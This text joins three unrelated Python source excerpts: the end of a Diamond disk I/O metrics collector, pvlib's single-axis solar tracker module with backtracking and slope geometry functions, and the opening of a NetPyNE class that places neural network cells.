READS_SECTORS: 'sectors_read',
READS_MILLISECONDS: 'ms_read',
WRITES: 'num_writes',
WRITES_MERGED: 'merged_writes',
WRITES_SECTORS: 'sectors_written',
WRITES_MILLISECONDS: 'ms_written',
IO_IN_PROGRESS: 'io_inprogress',
IO_MILLISECONDS: 'ms_doing_io',
IO_MILLISECONDS_WEIGHTED: 'ms_doing_io_weighted',
}
LastCollectTime = None
def __init__(self, config, handlers):
super(DiskUsageCollector, self).__init__(config, handlers)
self.raw_stats_only = str_to_bool(self.config['raw_stats_only'])
def get_default_config_help(self):
config_help = super(DiskUsageCollector, self).get_default_config_help()
config_help.update({
'devices': "A regex of which devices to gather metrics for."
+ " Defaults to md, sd, xvd, disk, and dm devices",
'sector_size': 'The size to use to calculate sector usage',
'send_zero': 'Send io data even when there is no io',
})
return config_help
def get_default_config(self):
"""
Returns the default collector settings
"""
config = super(DiskUsageCollector, self).get_default_config()
config.update({
'enabled': 'True',
'path': 'iostat',
'devices': ('PhysicalDrive[0-9]+$'
+ '|md[0-9]+$'
+ '|sd[a-z]+[0-9]*$'
+ '|x?vd[a-z]+[0-9]*$'
+ '|disk[0-9]+$'
+ '|dm\-[0-9]+$'),
'sector_size': 512,
'send_zero': False,
'raw_stats_only': False
})
return config
def get_metric_name(self, name):
if self.raw_stats_only:
return self.RAW_METRIC_NAMES[name]
return name
def get_disk_statistics(self):
"""
Create a map of disks in the machine.
http://www.kernel.org/doc/Documentation/iostats.txt
Returns:
(major, minor) -> DiskStatistics(device, ...)
"""
result = {}
if os.access('/proc/diskstats', os.R_OK):
self.proc_diskstats = True
fp = open('/proc/diskstats')
try:
for line in fp:
try:
columns = line.split()
# On early linux v2.6 versions, partitions have only 4
# output fields not 11. From linux 2.6.25 partitions
# have the full stats set.
if len(columns) < 14:
continue
major = int(columns[0])
minor = int(columns[1])
device = columns[2]
if (device.startswith('ram')
or device.startswith('loop')):
continue
result[(major, minor)] = {
'device': device,
self.get_metric_name(self.READS): float(columns[3]),
self.get_metric_name(self.READS_MERGED): float(columns[4]),
self.get_metric_name(self.READS_SECTORS): float(columns[5]),
self.get_metric_name(self.READS_MILLISECONDS): float(columns[6]),
self.get_metric_name(self.WRITES): float(columns[7]),
self.get_metric_name(self.WRITES_MERGED): float(columns[8]),
self.get_metric_name(self.WRITES_SECTORS): float(columns[9]),
self.get_metric_name(self.WRITES_MILLISECONDS): float(columns[10]),
self.get_metric_name(self.IO_IN_PROGRESS): float(columns[11]),
self.get_metric_name(self.IO_MILLISECONDS): float(columns[12]),
self.get_metric_name(self.IO_MILLISECONDS_WEIGHTED): float(columns[13])
}
except ValueError:
continue
finally:
fp.close()
else:
self.proc_diskstats = False
if not psutil:
self.log.error('Unable to import psutil')
return None
disks = psutil.disk_io_counters(True)
for disk in disks:
result[(0, len(result))] = {
'device': disk,
'reads': disks[disk].read_count,
'reads_sectors': (disks[disk].read_bytes
/ int(self.config['sector_size'])),
'reads_milliseconds': disks[disk].read_time,
'writes': disks[disk].write_count,
'writes_sectors': (disks[disk].write_bytes
/ int(self.config['sector_size'])),
'writes_milliseconds': disks[disk].write_time,
'io_milliseconds':
disks[disk].read_time + disks[disk].write_time,
'io_milliseconds_weighted':
disks[disk].read_time + disks[disk].write_time
}
return result
def collect(self):
# Handle collection time intervals correctly
CollectTime = time.time()
time_delta = float(self.config['interval'])
if self.LastCollectTime:
time_delta = CollectTime - self.LastCollectTime
if not time_delta:
time_delta = float(self.config['interval'])
self.LastCollectTime = CollectTime
exp = self.config['devices']
reg = re.compile(exp)
results = self.get_disk_statistics()
if not results:
self.log.error('No diskspace metrics retrieved')
return None
for key, info in results.iteritems():
metrics = {}
name = info['device']
if not reg.match(name):
continue
if self.raw_stats_only:
for k, v in info.iteritems():
if k == 'device':
continue
metric_name = '/'.join((name, k))
self.publish(metric_name, v)
continue
for key, value in info.iteritems():
if key == 'device':
continue
oldkey = key
for unit in self.config['byte_unit']:
key = oldkey
if key.endswith('sectors'):
key = key.replace('sectors', unit)
value /= (1024 / int(self.config['sector_size']))
value = diamond.convertor.binary.convert(value=value,
oldUnit='kB',
newUnit=unit)
self.MAX_VALUES[key] = diamond.convertor.binary.convert(
value=diamond.collector.MAX_COUNTER,
oldUnit='byte',
newUnit=unit)
metric_name = '.'.join([info['device'], key])
# io_in_progress is a point in time counter, !derivative
if key != 'io_in_progress':
metric_value = self.derivative(
metric_name,
value,
self.MAX_VALUES[key],
time_delta=False)
else:
metric_value = value
metrics[key] = metric_value
if self.proc_diskstats:
metrics['read_requests_merged_per_second'] = (
metrics['reads_merged'] / time_delta)
metrics['write_requests_merged_per_second'] = (
metrics['writes_merged'] / time_delta)
metrics['reads_per_second'] = metrics['reads'] / time_delta
metrics['writes_per_second'] = metrics['writes'] / time_delta
for unit in self.config['byte_unit']:
metric_name = 'read_%s_per_second' % unit
key = 'reads_%s' % unit
metrics[metric_name] = metrics[key] / time_delta
metric_name = 'write_%s_per_second' % unit
key = 'writes_%s' % unit
metrics[metric_name] = metrics[key] / time_delta
# Set to zero so the nodes are valid even if we have 0 io for
# the metric duration
metric_name = 'average_request_size_%s' % unit
metrics[metric_name] = 0
metrics['io'] = metrics['reads'] + metrics['writes']
metrics['average_queue_length'] = (
metrics['io_milliseconds_weighted']
/ time_delta
/ 1000.0)
metrics['util_percentage'] = (metrics['io_milliseconds']
/ time_delta
/ 10.0)
if metrics['reads'] > 0:
metrics['read_await'] = (
metrics['reads_milliseconds'] / metrics['reads'])
else:
metrics['read_await'] = 0
if metrics['writes'] > 0:
metrics['write_await'] = (
metrics['writes_milliseconds'] / metrics['writes'])
else:
metrics['write_await'] = 0
for unit in self.config['byte_unit']:
rkey = 'reads_%s' % unit
wkey = 'writes_%s' % unit
metric_name = 'average_request_size_%s' % unit
if (metrics['io'] > 0):
metrics[metric_name] = (
metrics[rkey] + metrics[wkey]) / metrics['io']
else:
metrics[metric_name] = 0
metrics['iops'] = metrics['io'] / time_delta
if (metrics['io'] > 0):
metrics['service_time'] = (
metrics['io_milliseconds'] / metrics['io'])
metrics['await'] = (
metrics['reads_milliseconds']
+ metrics['writes_milliseconds']) / metrics['io']
else:
metrics['service_time'] = 0
metrics['await'] = 0
# http://www.scribd.com/doc/15013525
# Page 28
metrics['concurrent_io'] = (metrics['reads_per_second']
+ metrics['writes_per_second']
) * (metrics['service_time']
/ 1000.0)
# Only publish when we have io figures
if (metrics['io'] > 0 or self.config['send_zero']):
for key in metrics:
metric_name = '.'.join([info['device'], key]).replace(
'/', '_')
self.publish(metric_name, metrics[key])
|
|
import numpy as np
import pandas as pd
from pvlib.tools import cosd, sind, tand
from pvlib.pvsystem import (
PVSystem, Array, SingleAxisTrackerMount, _unwrap_single_value
)
from pvlib import irradiance, atmosphere
from pvlib._deprecation import deprecated
@deprecated('0.9.0', alternative='PVSystem with SingleAxisTrackerMount')
class SingleAxisTracker(PVSystem):
"""
A class for single-axis trackers that inherits the PV modeling methods from
:py:class:`~pvlib.pvsystem.PVSystem`. For details on calculating tracker
rotation see :py:func:`pvlib.tracking.singleaxis`.
Parameters
----------
axis_tilt : float, default 0
The tilt of the axis of rotation (i.e, the y-axis defined by
axis_azimuth) with respect to horizontal, in decimal degrees.
axis_azimuth : float, default 0
A value denoting the compass direction along which the axis of
rotation lies. Measured in decimal degrees east of north.
max_angle : float, default 90
A value denoting the maximum rotation angle, in decimal degrees,
of the one-axis tracker from its horizontal position (horizontal
if axis_tilt = 0). A max_angle of 90 degrees allows the tracker
to rotate to a vertical position to point the panel towards a
horizon. max_angle of 180 degrees allows for full rotation.
backtrack : bool, default True
Controls whether the tracker has the capability to "backtrack"
to avoid row-to-row shading. False denotes no backtrack
capability. True denotes backtrack capability.
gcr : float, default 2.0/7.0
A value denoting the ground coverage ratio of a tracker system
which utilizes backtracking; i.e. the ratio between the PV array
surface area to total ground area. A tracker system with modules
2 meters wide, centered on the tracking axis, with 6 meters
between the tracking axes has a gcr of 2/6=0.333. If gcr is not
provided, a gcr of 2/7 is default. gcr must be <=1.
cross_axis_tilt : float, default 0.0
The angle, relative to horizontal, of the line formed by the
intersection between the slope containing the tracker axes and a plane
perpendicular to the tracker axes. Cross-axis tilt should be specified
using a right-handed convention. For example, trackers with axis
azimuth of 180 degrees (heading south) will have a negative cross-axis
tilt if the tracker axes plane slopes down to the east and positive
cross-axis tilt if the tracker axes plane slopes up to the east. Use
:func:`~pvlib.tracking.calc_cross_axis_tilt` to calculate
`cross_axis_tilt`. [degrees]
**kwargs
Passed to :py:class:`~pvlib.pvsystem.PVSystem`. If the `arrays`
parameter is specified it must have only a single Array. Furthermore
if a :py:class:`~pvlib.pvsystem.Array` is provided it must have
``surface_tilt`` and ``surface_azimuth`` equal to None.
Raises
------
ValueError
If more than one Array is specified.
ValueError
If an Array is provided with a surface tilt or azimuth not None.
See also
--------
pvlib.tracking.singleaxis
pvlib.tracking.calc_axis_tilt
pvlib.tracking.calc_cross_axis_tilt
"""
def __init__(self, axis_tilt=0, axis_azimuth=0, max_angle=90,
backtrack=True, gcr=2.0/7.0, cross_axis_tilt=0.0, **kwargs):
mount_kwargs = {
k: kwargs.pop(k) for k in ['racking_model', 'module_height']
if k in kwargs
}
mount = SingleAxisTrackerMount(axis_tilt, axis_azimuth, max_angle,
backtrack, gcr, cross_axis_tilt,
**mount_kwargs)
array_defaults = {
'albedo': None, 'surface_type': None, 'module': None,
'module_type': None, 'module_parameters': None,
'temperature_model_parameters': None,
'modules_per_string': 1,
}
array_kwargs = {
key: kwargs.get(key, array_defaults[key]) for key in array_defaults
}
# strings/strings_per_inverter is a special case
array_kwargs['strings'] = kwargs.get('strings_per_inverter', 1)
array = Array(mount=mount, **array_kwargs)
pass_through_kwargs = { # other args to pass to PVSystem()
k: v for k, v in kwargs.items() if k not in array_defaults
}
# leave these in case someone is using them
self.axis_tilt = axis_tilt
self.axis_azimuth = axis_azimuth
self.max_angle = max_angle
self.backtrack = backtrack
self.gcr = gcr
self.cross_axis_tilt = cross_axis_tilt
pass_through_kwargs['surface_tilt'] = None
pass_through_kwargs['surface_azimuth'] = None
super().__init__(arrays=[array], **pass_through_kwargs)
def __repr__(self):
attrs = ['axis_tilt', 'axis_azimuth', 'max_angle', 'backtrack', 'gcr',
'cross_axis_tilt']
sat_repr = ('SingleAxisTracker:\n ' + '\n '.join(
f'{attr}: {getattr(self, attr)}' for attr in attrs))
# get the parent PVSystem info
pvsystem_repr = super().__repr__()
# remove the first line (contains 'PVSystem: \n')
pvsystem_repr = '\n'.join(pvsystem_repr.split('\n')[1:])
return sat_repr + '\n' + pvsystem_repr
def singleaxis(self, apparent_zenith, apparent_azimuth):
"""
Get tracking data. See :py:func:`pvlib.tracking.singleaxis` more
detail.
Parameters
----------
apparent_zenith : float, 1d array, or Series
Solar apparent zenith angles in decimal degrees.
apparent_azimuth : float, 1d array, or Series
Solar apparent azimuth angles in decimal degrees.
Returns
-------
tracking data
"""
tracking_data = singleaxis(apparent_zenith, apparent_azimuth,
self.axis_tilt, self.axis_azimuth,
self.max_angle, self.backtrack,
self.gcr, self.cross_axis_tilt)
return tracking_data
def get_aoi(self, surface_tilt, surface_azimuth, solar_zenith,
solar_azimuth):
"""Get the angle of incidence on the system.
For a given set of solar zenith and azimuth angles, the
surface tilt and azimuth parameters are typically determined
by :py:meth:`~SingleAxisTracker.singleaxis`. The
:py:meth:`~SingleAxisTracker.singleaxis` method also returns
the angle of incidence, so this method is only needed
if using a different tracking algorithm.
Parameters
----------
surface_tilt : numeric
Panel tilt from horizontal.
surface_azimuth : numeric
Panel azimuth from north
solar_zenith : float or Series.
Solar zenith angle.
solar_azimuth : float or Series.
Solar azimuth angle.
Returns
-------
aoi : Series
The angle of incidence in degrees from normal.
"""
aoi = irradiance.aoi(surface_tilt, surface_azimuth,
solar_zenith, solar_azimuth)
return aoi
@_unwrap_single_value
def get_irradiance(self, surface_tilt, surface_azimuth,
solar_zenith, solar_azimuth, dni, ghi, dhi,
dni_extra=None, airmass=None, model='haydavies',
**kwargs):
"""
Uses the :func:`irradiance.get_total_irradiance` function to
calculate the plane of array irradiance components on a tilted
surface defined by the input data and ``self.albedo``.
For a given set of solar zenith and azimuth angles, the
surface tilt and azimuth parameters are typically determined
by :py:meth:`~SingleAxisTracker.singleaxis`.
Parameters
----------
surface_tilt : numeric
Panel tilt from horizontal.
surface_azimuth : numeric
Panel azimuth from north
solar_zenith : numeric
Solar zenith angle.
solar_azimuth : numeric
Solar azimuth angle.
dni : float or Series
Direct Normal Irradiance
ghi : float or Series
Global horizontal irradiance
dhi : float or Series
Diffuse horizontal irradiance
dni_extra : float or Series, default None
Extraterrestrial direct normal irradiance
airmass : float or Series, default None
Airmass
model : String, default 'haydavies'
Irradiance model.
**kwargs
Passed to :func:`irradiance.get_total_irradiance`.
Returns
-------
poa_irradiance : DataFrame
Column names are: ``total, beam, sky, ground``.
"""
# not needed for all models, but this is easier
if dni_extra is None:
dni_extra = irradiance.get_extra_radiation(solar_zenith.index)
if airmass is None:
airmass = atmosphere.get_relative_airmass(solar_zenith)
# SingleAxisTracker only supports a single Array, but we need the
# validate/iterate machinery so that single length tuple input/output
# is handled the same as PVSystem.get_irradiance. GH 1159
dni = self._validate_per_array(dni, system_wide=True)
ghi = self._validate_per_array(ghi, system_wide=True)
dhi = self._validate_per_array(dhi, system_wide=True)
return tuple(
irradiance.get_total_irradiance(
surface_tilt,
surface_azimuth,
solar_zenith,
solar_azimuth,
dni, ghi, dhi,
dni_extra=dni_extra,
airmass=airmass,
model=model,
albedo=self.arrays[0].albedo,
**kwargs)
for array, dni, ghi, dhi in zip(
self.arrays, dni, ghi, dhi
)
)
def singleaxis(apparent_zenith, apparent_azimuth,
axis_tilt=0, axis_azimuth=0, max_angle=90,
backtrack=True, gcr=2.0/7.0, cross_axis_tilt=0):
"""
Determine the rotation angle of a single-axis tracker when given particular
solar zenith and azimuth angles.
See [1]_ for details about the equations. Backtracking may be specified,
and if so, a ground coverage ratio is required.
Rotation angle is determined in a right-handed coordinate system. The
tracker `axis_azimuth` defines the positive y-axis, the positive x-axis is
90 degrees clockwise from the y-axis and parallel to the Earth's surface,
and the positive z-axis is normal to both x & y-axes and oriented skyward.
Rotation angle `tracker_theta` is a right-handed rotation around the y-axis
in the x, y, z coordinate system and indicates tracker position relative to
horizontal. For example, if tracker `axis_azimuth` is 180 (oriented south)
and `axis_tilt` is zero, then a `tracker_theta` of zero is horizontal, a
`tracker_theta` of 30 degrees is a rotation of 30 degrees towards the west,
and a `tracker_theta` of -90 degrees is a rotation to the vertical plane
facing east.
Parameters
----------
apparent_zenith : float, 1d array, or Series
Solar apparent zenith angles in decimal degrees.
apparent_azimuth : float, 1d array, or Series
Solar apparent azimuth angles in decimal degrees.
axis_tilt : float, default 0
The tilt of the axis of rotation (i.e, the y-axis defined by
axis_azimuth) with respect to horizontal, in decimal degrees.
axis_azimuth : float, default 0
A value denoting the compass direction along which the axis of
rotation lies. Measured in decimal degrees east of north.
max_angle : float, default 90
A value denoting the maximum rotation angle, in decimal degrees,
of the one-axis tracker from its horizontal position (horizontal
if axis_tilt = 0). A max_angle of 90 degrees allows the tracker
to rotate to a vertical position to point the panel towards a
horizon. max_angle of 180 degrees allows for full rotation.
backtrack : bool, default True
Controls whether the tracker has the capability to "backtrack"
to avoid row-to-row shading. False denotes no backtrack
capability. True denotes backtrack capability.
gcr : float, default 2.0/7.0
A value denoting the ground coverage ratio of a tracker system
which utilizes backtracking; i.e. the ratio between the PV array
surface area to total ground area. A tracker system with modules
2 meters wide, centered on the tracking axis, with 6 meters
between the tracking axes has a gcr of 2/6=0.333. If gcr is not
provided, a gcr of 2/7 is default. gcr must be <=1.
cross_axis_tilt : float, default 0.0
The angle, relative to horizontal, of the line formed by the
intersection between the slope containing the tracker axes and a plane
perpendicular to the tracker axes. Cross-axis tilt should be specified
using a right-handed convention. For example, trackers with axis
azimuth of 180 degrees (heading south) will have a negative cross-axis
tilt if the tracker axes plane slopes down to the east and positive
cross-axis tilt if the tracker axes plane slopes up to the east. Use
:func:`~pvlib.tracking.calc_cross_axis_tilt` to calculate
`cross_axis_tilt`. [degrees]
Returns
-------
dict or DataFrame with the following columns:
* `tracker_theta`: The rotation angle of the tracker.
tracker_theta = 0 is horizontal, and positive rotation angles are
clockwise. [degrees]
* `aoi`: The angle-of-incidence of direct irradiance onto the
rotated panel surface. [degrees]
* `surface_tilt`: The angle between the panel surface and the earth
surface, accounting for panel rotation. [degrees]
* `surface_azimuth`: The azimuth of the rotated panel, determined by
projecting the vector normal to the panel's surface to the earth's
surface. [degrees]
See also
--------
pvlib.tracking.calc_axis_tilt
pvlib.tracking.calc_cross_axis_tilt
References
----------
.. [1] Kevin Anderson and Mark Mikofski, "Slope-Aware Backtracking for
Single-Axis Trackers", Technical Report NREL/TP-5K00-76626, July 2020.
https://www.nrel.gov/docs/fy20osti/76626.pdf
"""
# MATLAB to Python conversion by
# Will Holmgren (@wholmgren), U. Arizona. March, 2015.
if isinstance(apparent_zenith, pd.Series):
index = apparent_zenith.index
else:
index = None
# convert scalars to arrays
apparent_azimuth = np.atleast_1d(apparent_azimuth)
apparent_zenith = np.atleast_1d(apparent_zenith)
if apparent_azimuth.ndim > 1 or apparent_zenith.ndim > 1:
raise ValueError('Input dimensions must not exceed 1')
# Calculate sun position x, y, z using coordinate system as in [1], Eq 1.
# NOTE: solar elevation = 90 - solar zenith, then use trig identities:
# sin(90-x) = cos(x) & cos(90-x) = sin(x)
sin_zenith = sind(apparent_zenith)
x = sin_zenith * sind(apparent_azimuth)
y = sin_zenith * cosd(apparent_azimuth)
z = cosd(apparent_zenith)
# Assume the tracker reference frame is right-handed. Positive y-axis is
# oriented along tracking axis; from north, the y-axis is rotated clockwise
# by the axis azimuth and tilted from horizontal by the axis tilt. The
# positive x-axis is 90 deg clockwise from the y-axis and parallel to
# horizontal (e.g., if the y-axis is south, the x-axis is west); the
# positive z-axis is normal to the x and y axes, pointed upward.
# Calculate sun position (xp, yp, zp) in tracker coordinate system using
# [1] Eq 4.
cos_axis_azimuth = cosd(axis_azimuth)
sin_axis_azimuth = sind(axis_azimuth)
cos_axis_tilt = cosd(axis_tilt)
sin_axis_tilt = sind(axis_tilt)
xp = x*cos_axis_azimuth - y*sin_axis_azimuth
yp = (x*cos_axis_tilt*sin_axis_azimuth
+ y*cos_axis_tilt*cos_axis_azimuth
- z*sin_axis_tilt)
zp = (x*sin_axis_tilt*sin_axis_azimuth
+ y*sin_axis_tilt*cos_axis_azimuth
+ z*cos_axis_tilt)
# The ideal tracking angle wid is the rotation to place the sun position
# vector (xp, yp, zp) in the (y, z) plane, which is normal to the panel and
# contains the axis of rotation. wid = 0 indicates that the panel is
# horizontal. Here, our convention is that a clockwise rotation is
# positive, to view rotation angles in the same frame of reference as
# azimuth. For example, for a system with tracking axis oriented south, a
# rotation toward the east is negative, and a rotation to the west is
# positive. This is a right-handed rotation around the tracker y-axis.
# Calculate angle from x-y plane to projection of sun vector onto x-z plane
# using [1] Eq. 5.
wid = np.degrees(np.arctan2(xp, zp))
# filter for sun above panel horizon
zen_gt_90 = apparent_zenith > 90
wid[zen_gt_90] = np.nan
# Account for backtracking
if backtrack:
# distance between rows in terms of rack lengths relative to cross-axis
# tilt
axes_distance = 1/(gcr * cosd(cross_axis_tilt))
# NOTE: account for rare angles below array, see GH 824
temp = np.abs(axes_distance * cosd(wid - cross_axis_tilt))
# backtrack angle using [1], Eq. 14
with np.errstate(invalid='ignore'):
wc = np.degrees(-np.sign(wid)*np.arccos(temp))
# NOTE: in the middle of the day, arccos(temp) is out of range because
# there's no row-to-row shade to avoid, & backtracking is unnecessary
# [1], Eqs. 15-16
with np.errstate(invalid='ignore'):
tracker_theta = wid + np.where(temp < 1, wc, 0)
else:
tracker_theta = wid
# NOTE: max_angle defined relative to zero-point rotation, not the
# system-plane normal
tracker_theta = np.clip(tracker_theta, -max_angle, max_angle)
# Calculate panel normal vector in panel-oriented x, y, z coordinates.
# y-axis is axis of tracker rotation. tracker_theta is a compass angle
# (clockwise is positive) rather than a trigonometric angle.
# NOTE: the *0 is a trick to preserve NaN values.
panel_norm = np.array([sind(tracker_theta),
tracker_theta*0,
cosd(tracker_theta)])
# sun position in vector format in panel-oriented x, y, z coordinates
sun_vec = np.array([xp, yp, zp])
# calculate angle-of-incidence on panel
# TODO: use irradiance.aoi
projection = np.clip(np.sum(sun_vec*panel_norm, axis=0), -1, 1)
aoi = np.degrees(np.arccos(projection))
# Calculate panel tilt and azimuth in a coordinate system where the panel
# tilt is the angle from horizontal, and the panel azimuth is the compass
# angle (clockwise from north) to the projection of the panel's normal to
# the earth's surface. These outputs are provided for convenience and
# comparison with other PV software which use these angle conventions.
# Project normal vector to earth surface. First rotate about x-axis by
# angle -axis_tilt so that y-axis is also parallel to earth surface, then
# project.
# Calculate standard rotation matrix
rot_x = np.array([[1, 0, 0],
[0, cosd(-axis_tilt), -sind(-axis_tilt)],
[0, sind(-axis_tilt), cosd(-axis_tilt)]])
# panel_norm_earth contains the normal vector expressed in earth-surface
# coordinates (z normal to surface, y aligned with tracker axis parallel to
# earth)
panel_norm_earth = np.dot(rot_x, panel_norm).T
# projection to plane tangent to earth surface, in earth surface
# coordinates
projected_normal = np.array([panel_norm_earth[:, 0],
panel_norm_earth[:, 1],
panel_norm_earth[:, 2]*0]).T
# calculate vector magnitudes
projected_normal_mag = np.sqrt(np.nansum(projected_normal**2, axis=1))
# renormalize the projected vector, avoid creating nan values.
non_zeros = projected_normal_mag != 0
projected_normal[non_zeros] = (projected_normal[non_zeros].T /
projected_normal_mag[non_zeros]).T
# calculation of surface_azimuth
surface_azimuth = \
np.degrees(np.arctan2(projected_normal[:, 1], projected_normal[:, 0]))
# Rotate 0 reference from panel's x-axis to its y-axis and then back to
# north.
surface_azimuth = 90 - surface_azimuth + axis_azimuth
# Map azimuth into [0,360) domain.
with np.errstate(invalid='ignore'):
surface_azimuth = surface_azimuth % 360
# Calculate surface_tilt
dotproduct = (panel_norm_earth * projected_normal).sum(axis=1)
surface_tilt = 90 - np.degrees(np.arccos(dotproduct))
# Bundle DataFrame for return values and filter for sun below horizon.
out = {'tracker_theta': tracker_theta, 'aoi': aoi,
'surface_tilt': surface_tilt, 'surface_azimuth': surface_azimuth}
if index is not None:
out = pd.DataFrame(out, index=index)
out = out[['tracker_theta', 'aoi', 'surface_azimuth', 'surface_tilt']]
out[zen_gt_90] = np.nan
else:
out = {k: np.where(zen_gt_90, np.nan, v) for k, v in out.items()}
return out
def calc_axis_tilt(slope_azimuth, slope_tilt, axis_azimuth):
"""
Calculate tracker axis tilt in the global reference frame when on a sloped
plane.
Parameters
----------
slope_azimuth : float
direction of normal to slope on horizontal [degrees]
slope_tilt : float
tilt of normal to slope relative to vertical [degrees]
axis_azimuth : float
direction of tracker axes on horizontal [degrees]
Returns
-------
axis_tilt : float
tilt of tracker [degrees]
See also
--------
pvlib.tracking.singleaxis
pvlib.tracking.calc_cross_axis_tilt
Notes
-----
See [1]_ for derivation of equations.
References
----------
.. [1] Kevin Anderson and Mark Mikofski, "Slope-Aware Backtracking for
Single-Axis Trackers", Technical Report NREL/TP-5K00-76626, July 2020.
https://www.nrel.gov/docs/fy20osti/76626.pdf
"""
delta_gamma = axis_azimuth - slope_azimuth
# equations 18-19
tan_axis_tilt = cosd(delta_gamma) * tand(slope_tilt)
return np.degrees(np.arctan(tan_axis_tilt))
def _calc_tracker_norm(ba, bg, dg):
"""
Calculate tracker normal, v, cross product of tracker axis and unit normal,
N, to the system slope plane.
Parameters
----------
ba : float
axis tilt [degrees]
bg : float
ground tilt [degrees]
dg : float
delta gamma, difference between axis and ground azimuths [degrees]
Returns
-------
vector : tuple
vx, vy, vz
"""
cos_ba = cosd(ba)
cos_bg = cosd(bg)
sin_bg = sind(bg)
sin_dg = sind(dg)
vx = sin_dg * cos_ba * cos_bg
vy = sind(ba)*sin_bg + cosd(dg)*cos_ba*cos_bg
vz = -sin_dg*sin_bg*cos_ba
return vx, vy, vz
def _calc_beta_c(v, dg, ba):
"""
Calculate the cross-axis tilt angle.
Parameters
----------
v : tuple
tracker normal
dg : float
delta gamma, difference between axis and ground azimuths [degrees]
ba : float
axis tilt [degrees]
Returns
-------
beta_c : float
cross-axis tilt angle [radians]
"""
vnorm = np.sqrt(np.dot(v, v))
beta_c = np.arcsin(
((v[0]*cosd(dg) - v[1]*sind(dg)) * sind(ba) + v[2]*cosd(ba)) / vnorm)
return beta_c
def calc_cross_axis_tilt(
slope_azimuth, slope_tilt, axis_azimuth, axis_tilt):
"""
Calculate the angle, relative to horizontal, of the line formed by the
intersection between the slope containing the tracker axes and a plane
perpendicular to the tracker axes.
Use the cross-axis tilt to avoid row-to-row shade when backtracking on a
slope not parallel with the axis azimuth. Cross-axis tilt should be
specified using a right-handed convention. For example, trackers with axis
azimuth of 180 degrees (heading south) will have a negative cross-axis tilt
if the tracker axes plane slopes down to the east and positive cross-axis
tilt if the tracker axes plane slopes up to the east.
Parameters
----------
slope_azimuth : float
direction of the normal to the slope containing the tracker axes, when
projected on the horizontal [degrees]
slope_tilt : float
angle of the slope containing the tracker axes, relative to horizontal
[degrees]
axis_azimuth : float
direction of tracker axes projected on the horizontal [degrees]
axis_tilt : float
tilt of trackers relative to horizontal [degrees]
Returns
-------
cross_axis_tilt : float
angle, relative to horizontal, of the line formed by the intersection
between the slope containing the tracker axes and a plane perpendicular
to the tracker axes [degrees]
See also
--------
pvlib.tracking.singleaxis
pvlib.tracking.calc_axis_tilt
Notes
-----
See [1]_ for derivation of equations.
References
----------
.. [1] Kevin Anderson and Mark Mikofski, "Slope-Aware Backtracking for
Single-Axis Trackers", Technical Report NREL/TP-5K00-76626, July 2020.
https://www.nrel.gov/docs/fy20osti/76626.pdf
"""
# delta-gamma, difference between axis and slope azimuths
delta_gamma = axis_azimuth - slope_azimuth
# equation 22
v = _calc_tracker_norm(axis_tilt, slope_tilt, delta_gamma)
# equation 26
beta_c = _calc_beta_c(v, delta_gamma, axis_tilt)
return np.degrees(beta_c)
|
|
"""
pop.py
Contains Population related classes
Contributors: salvadordura@gmail.com
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
from __future__ import absolute_import
from builtins import map
from builtins import range
try:
basestring
except NameError:
basestring = str
from future import standard_library
standard_library.install_aliases()
from numpy import pi, sqrt, sin, cos, arccos
import numpy as np
from neuron import h # Import NEURON
###############################################################################
#
# POPULATION CLASS
#
###############################################################################
class Pop (object):
''' Python class to instantiate the network population '''
def __init__(self, label, tags):
self.tags = tags # list of tags/attributes of population (eg. numCells, cellModel,...)
self.tags['pop'] = label
self.cellGids = [] # list of cell gids beloging to this pop
self._setCellClass() # set type of cell
self.rand = h.Random() # random number generator
def _distributeCells(self, numCellsPop):
''' distribute cells across compute nodes using round-robin'''
from .. import sim
hostCells = {}
for i in range(sim.nhosts):
hostCells[i] = []
for i in range(numCellsPop):
hostCells[sim.nextHost].append(i)
sim.nextHost+=1
if sim.nextHost>=sim.nhosts:
sim.nextHost=0
if sim.cfg.verbose:
print(("Distributed population of %i cells on %s hosts: %s, next: %s"%(numCellsPop,sim.nhosts,hostCells,sim.nextHost)))
return hostCells
def createCells(self):
'''Function to instantiate Cell objects based on the characteristics of this population'''
# add individual cells
if 'cellsList' in self.tags:
cells = self.createCellsList()
# create cells based on fixed number of cells
elif 'numCells' in self.tags:
cells = self.createCellsFixedNum()
# create cells based on density (optional ynorm-dep)
elif 'density' in self.tags:
cells = self.createCellsDensity()
# create cells based on density (optional ynorm-dep)
elif 'gridSpacing' in self.tags:
cells = self.createCellsGrid()
# not enough tags to create cells
else:
self.tags['numCells'] = 1
print('Warninig: number or density of cells not specified for population %s; defaulting to numCells = 1' % (self.tags['pop']))
cells = self.createCellsFixedNum()
return cells
def createCellsFixedNum (self):
''' Create population cells based on fixed number of cells'''
from .. import sim
cells = []
self.rand.Random123(self.tags['numCells'], sim.net.lastGid, sim.cfg.seeds['loc'])
self.rand.uniform(0, 1)
vec = h.Vector(self.tags['numCells']*3)
vec.setrand(self.rand)
randLocs = np.array(vec).reshape(self.tags['numCells'], 3) # create random x,y,z locations
if sim.net.params.shape == 'cylinder':
# Use the x,z random vales
rho = randLocs[:,0] # use x rand value as the radius rho in the interval [0, 1)
phi = 2 * pi * randLocs[:,2] # use z rand value as the angle phi in the interval [0, 2*pi)
x = (1 + sqrt(rho) * cos(phi))/2.0
z = (1 + sqrt(rho) * sin(phi))/2.0
randLocs[:,0] = x
randLocs[:,2] = z
elif sim.net.params.shape == 'ellipsoid':
# Use the x,y,z random vales
rho = np.power(randLocs[:,0], 1.0/3.0) # use x rand value as the radius rho in the interval [0, 1); cuberoot
phi = 2 * pi * randLocs[:,1] # use y rand value as the angle phi in the interval [0, 2*pi)
costheta = (2 * randLocs[:,2]) - 1 # use z rand value as cos(theta) in the interval [-1, 1); ensures uniform dist
theta = arccos(costheta) # obtain theta from cos(theta)
x = (1 + rho * cos(phi) * sin(theta))/2.0
y = (1 + rho * sin(phi) * sin(theta))/2.0
z = (1 + rho * cos(theta))/2.0
randLocs[:,0] = x
randLocs[:,1] = y
randLocs[:,2] = z
for icoord, coord in enumerate(['x', 'y', 'z']):
if coord+'Range' in self.tags: # if user provided absolute range, convert to normalized
self.tags[coord+'normRange'] = [float(point) / getattr(sim.net.params, 'size'+coord.upper()) for point in self.tags[coord+'Range']]
# constrain to range set by user
if coord+'normRange' in self.tags: # if normalized range, rescale random locations
minv = self.tags[coord+'normRange'][0]
maxv = self.tags[coord+'normRange'][1]
randLocs[:,icoord] = randLocs[:,icoord] * (maxv-minv) + minv
for i in self._distributeCells(int(sim.net.params.scale * self.tags['numCells']))[sim.rank]:
